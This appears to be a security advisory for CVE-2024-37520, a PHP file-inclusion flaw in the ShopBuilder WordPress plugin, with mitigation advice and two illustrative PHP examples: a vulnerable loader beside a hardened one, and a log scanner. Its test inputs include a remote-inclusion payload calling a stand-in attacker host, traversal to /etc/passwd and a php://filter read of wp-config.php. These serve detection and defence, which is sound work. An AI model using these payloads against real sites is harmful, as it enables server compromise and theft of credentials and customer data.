CVE-2024-37520: Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') in RadiusTheme ShopBuilder – Elementor WooCommerce Builder Addons
Description
Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in RadiusTheme ShopBuilder – Elementor WooCommerce Builder Addons (plugin slug: shopbuilder). This issue affects ShopBuilder – Elementor WooCommerce Builder Addons: from n/a through 2.1.12 inclusive.
AI Analysis
Technical Summary
CVE-2024-37520 is a file-inclusion vulnerability (CWE-98) in the RadiusTheme ShopBuilder – Elementor WooCommerce Builder Addons plugin for WordPress, affecting versions up to and including 2.1.12. The plugin passes a filename it does not adequately validate to a PHP include or require statement. Because include and require compile and execute whatever file they load, an attacker who controls that filename can make the server execute code of their choosing. Whether the inclusion can actually be remote depends on the server: PHP fetches include targets over HTTP only when allow_url_include is On, a setting that has been Off by default since it was introduced and deprecated since PHP 7.4. On the far more common Off configuration the same flaw is still exploitable as a Local File Inclusion: directory traversal to read files such as wp-config.php, php://filter to exfiltrate source, or execution of a file the attacker has already placed on the host (an upload or a poisoned log). The advisory does not state what privilege level is needed to reach the vulnerable code path, and no CVSS vector has been assigned, so the authentication requirement should be treated as unknown rather than assumed. The plugin extends WooCommerce through Elementor page-builder widgets and is installed on many WordPress storefronts. No public exploit has been reported at the time of writing, but file-inclusion flaws are straightforward to weaponize once the parameter is known and typically end in full compromise of the web server. The CVE was reserved by Patchstack on 9 June 2024 and published in July 2024. The advisory carries no patch reference, so operators should check the plugin changelog for a release newer than 2.1.12 rather than assume a fix either exists or is still pending.
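The include-from-request-input pattern described above, as an added PHP example that is not ShopBuilder's or RadiusTheme's code: a vulnerable template loader beside a hardened one that selects from an allowlist and then confines the canonical path to the template directory. The `template` parameter, the template names and the directory layout are assumptions chosen for illustration.

```php
<?php
declare(strict_types=1);

// Added example, not code from ShopBuilder or RadiusTheme. The "template"
// parameter, the template names and the directory layout are assumptions
// chosen to illustrate CWE-98 and its fix.

// --- Vulnerable: the include target is composed from request input ----------
function render_template_vulnerable(string $template): void
{
    // With allow_url_include=On (Off by default, deprecated since PHP 7.4)
    // $template = "http://attacker.example/x.txt" fetches and executes remote
    // code. With it Off the same sink is still a Local File Inclusion:
    // "../../../../etc/passwd",
    // "php://filter/convert.base64-encode/resource=wp-config.php", or a file
    // the attacker already placed on the host (upload, poisoned log) all work.
    include $template;
}

// --- Hardened: allowlist first, canonical-path containment second -----------
const ALLOWED_TEMPLATES = ['product-grid', 'cart', 'checkout']; // assumed names

function resolve_template(string $name, string $templateDir): ?string
{
    // 1. Only bare names the plugin ships. This alone rejects URLs, stream
    //    wrappers and traversal, because none of them is in the list.
    if (!in_array($name, ALLOWED_TEMPLATES, true)) {
        return null;
    }
    // 2. The path is built from trusted parts; the input selects, never composes.
    $base = realpath($templateDir);
    $path = realpath($templateDir . '/' . $name . '.php');
    // realpath() returns false for a missing file, so an allowed name whose
    // file is absent is rejected instead of falling through to include().
    if ($base === false || $path === false) {
        return null;
    }
    // 3. Defence in depth: the canonical path must still lie inside the
    //    template directory (covers a symlinked or misconfigured directory).
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

function render_template_hardened(string $name, string $templateDir): void
{
    $path = resolve_template($name, $templateDir);
    if ($path === null) {
        http_response_code(400);
        echo 'invalid template';
        return;
    }
    include $path;
}

// --- Constructed self-check (run with: php rfi_example.php) ------------------
$dir = sys_get_temp_dir() . '/rfi-example-' . bin2hex(random_bytes(4));
mkdir($dir);
file_put_contents($dir . '/product-grid.php', "<?php echo 'grid ok';");
file_put_contents($dir . '/cart.php', "<?php echo 'cart ok';");

$inputs = [
    'product-grid',                                              // legitimate
    'cart',                                                      // legitimate
    'checkout',                                                  // allowed name, file absent
    'http://attacker.example/shell.txt',                         // RFI payload
    '../../../../etc/passwd',                                    // LFI traversal
    'php://filter/convert.base64-encode/resource=wp-config.php', // wrapper read
];
foreach ($inputs as $in) {
    $resolved = resolve_template($in, $dir);
    printf("%-60s -> %s\n", $in, $resolved === null ? 'REJECTED' : 'include ' . basename($resolved));
}

// The hardened loader still renders a legitimate template normally.
render_template_hardened('cart', $dir);
echo "\n";

foreach (glob($dir . '/*.php') as $f) {
    unlink($f);
}
rmdir($dir);
```

The allowlist is the real control; the realpath() containment exists so that a later refactor (a configurable template directory, a symlink, a Windows path) cannot quietly reopen the hole. Note that the vulnerable function is deliberately never called in the self-check.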
Potential Impact
Successful exploitation gives an attacker code execution as the web-server user on any WordPress store running ShopBuilder 2.1.12 or earlier. From there the attacker can read wp-config.php and the database credentials in it, dump or alter WooCommerce customer and order records, inject card-skimming JavaScript into checkout pages, deface the site, plant persistent backdoors (modified plugin files, new administrator accounts), or use the host to attack other targets. Availability is also at stake if the attacker deletes files or deploys ransomware. Confidentiality and integrity of customer and business data should be considered fully exposed once the flaw is exploited. The advisory does not state the privilege level needed to reach the vulnerable code; if the parameter is reachable by anonymous visitors, every internet-facing installation is exposed, and exploitation becomes likely as soon as a proof-of-concept is published. On a server with allow_url_include Off the attacker still gets file disclosure and, given an uploadable file or writable log, code execution, so the lower-impact case is not a safe one. Beyond the technical damage, a breach of an online store brings reputational harm, direct financial loss and regulatory exposure (card-data and privacy obligations) for the operator, which is why e-commerce plugins are attractive targets for financially motivated attackers.
Mitigation Recommendations
Patch first: check the wordpress.org plugin directory and RadiusTheme's release notes for a ShopBuilder release newer than 2.1.12 that references this issue, and update every affected site. If no fixed release is available, deactivate the plugin, and prefer deleting it: WordPress leaves a deactivated plugin's PHP files on disk, and a file that can be requested directly (one without an ABSPATH guard) stays reachable.

Harden the PHP runtime while exposed. Confirm allow_url_include is Off (the default; deprecated since PHP 7.4), which removes the remote-fetch variant entirely. Limit what a local inclusion can reach: set open_basedir to the WordPress root, keep the web-server user without write access to the document root apart from wp-content/uploads, and deny PHP execution in the uploads directory at the web-server level, since an uploaded file is the most common local-inclusion target. Block outbound HTTP/HTTPS from the web server except to known destinations (WordPress update servers, payment gateways) so a fetched payload or a reverse shell fails. Front the site with a WAF rule set that blocks query or body parameters containing a URL scheme (http://, https://, ftp://), a PHP stream wrapper (php://, phar://, data:, expect://) or traversal sequences (../ and their URL-encoded forms), and review access logs for the same indicators; a 200 response to such a request is an indicator of compromise and warrants forensic review of the host.

For anyone maintaining the plugin code or carrying a local patch: never pass request data to include or require; select the file from a fixed allowlist and resolve the path with realpath() inside the template directory. Keep file-integrity monitoring on wp-content and the WordPress core so a dropped web shell or modified plugin file is detected quickly, maintain tested offline backups of the site and database for recovery, and include plugin and theme inventory in regular vulnerability scanning so the next advisory for this plugin is caught promptly.
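A log-side check for the WAF and log-review advice above, as an added PHP example that is not from the advisory or the plugin: it scans access-log lines in combined format for inclusion payloads in query strings, decoding URL encoding first so that encoded probes are not missed. The log lines, addresses and the `template` parameter are constructed for the example.

```php
<?php
declare(strict_types=1);

// Added example, not from the advisory or the plugin: flag file-inclusion
// probes in web-server access logs. The log lines, addresses and the
// "template" parameter below are constructed for the example.

// Indicator patterns applied to the URL-decoded query string, keyed by label.
const INCLUSION_INDICATORS = [
    'remote URL'          => '~(?:^|[=&])(?:https?|ftp)://~i',
    'PHP stream wrapper'  => '~(?:^|[=&])(?:(?:php|phar|expect|zip|glob)://|data:)~i',
    'directory traversal' => '~(?:\.\./|\.\.\\\\)~',
    'null byte'           => '~\x00~',
];

// Attackers URL-encode payloads, sometimes twice; decode until the string
// stops changing (bounded so pathological input cannot loop).
function decode_query(string $query): string
{
    for ($i = 0; $i < 3; $i++) {
        $decoded = rawurldecode($query);
        if ($decoded === $query) {
            break;
        }
        $query = $decoded;
    }
    return $query;
}

// Returns a finding for one combined-format log line, or null if clean.
function inspect_log_line(string $line): ?array
{
    if (!preg_match('~"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})~', $line, $m)) {
        return null;
    }
    $url    = $m[1];
    $status = (int) $m[2];
    $qpos   = strpos($url, '?');
    if ($qpos === false) {
        return null; // no query string: nothing for this check to inspect
    }
    $path    = substr($url, 0, $qpos);
    $decoded = decode_query(substr($url, $qpos + 1));
    foreach (INCLUSION_INDICATORS as $label => $pattern) {
        if (preg_match($pattern, $decoded) === 1) {
            return ['reason' => $label, 'status' => $status, 'path' => $path, 'query' => $decoded];
        }
    }
    return null;
}

// Constructed sample: one legitimate request, three probes, one unrelated line.
$sampleLog = [
    '203.0.113.5 - - [10/Jul/2024:12:00:01 +0000] "GET /?page=shop&template=product-grid HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Jul/2024:12:00:03 +0000] "GET /?template=http://198.51.100.9/s.txt HTTP/1.1" 200 98 "-" "curl/8.0"',
    '203.0.113.7 - - [10/Jul/2024:12:00:04 +0000] "GET /?template=..%2F..%2F..%2Fwp-config.php HTTP/1.1" 500 0 "-" "curl/8.0"',
    '203.0.113.9 - - [10/Jul/2024:12:00:09 +0000] "GET /?template=php%3A%2F%2Ffilter%2Fconvert.base64-encode%2Fresource%3Dwp-config.php HTTP/1.1" 200 2200 "-" "python-requests/2.31"',
    '198.51.100.20 - - [10/Jul/2024:12:00:12 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
];

foreach ($sampleLog as $line) {
    $hit = inspect_log_line($line);
    if ($hit === null) {
        continue;
    }
    // A 2xx on a flagged request means the payload was at least processed by
    // the application; treat it as an incident lead, not just a blocked probe.
    printf("[%s] HTTP %d %s  query=%s%s\n",
        $hit['reason'], $hit['status'], $hit['path'], $hit['query'],
        $hit['status'] < 300 ? '  <-- succeeded, investigate' : '');
}
```

Two caveats when turning this into a WAF or SIEM rule: parameters that legitimately carry a URL (redirect_to, return URLs for payment gateways) will match the remote-URL indicator, so scope the rule to the plugin's endpoints or parameter once the vulnerable one is identified; and a vulnerable parameter that sits in the path rather than the query string needs the same indicators applied to the path.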
Affected Countries
United States, United Kingdom, Germany, Canada, Australia, France, India, Brazil, Netherlands, Japan, Italy, Spain
Technical Details
- Data Version: 5.2
- Assigner Short Name: Patchstack
- Date Reserved: 2024-06-09T13:11:26.616Z
- CVSS Version: null (no score assigned)
- State: PUBLISHED
Threat ID: 69cd745fe6bfc5ba1def6f40
Added to database: 4/1/2026, 7:39:11 PM
Last enriched: 4/2/2026, 5:13:32 AM
Last updated: 4/6/2026, 9:38:14 AM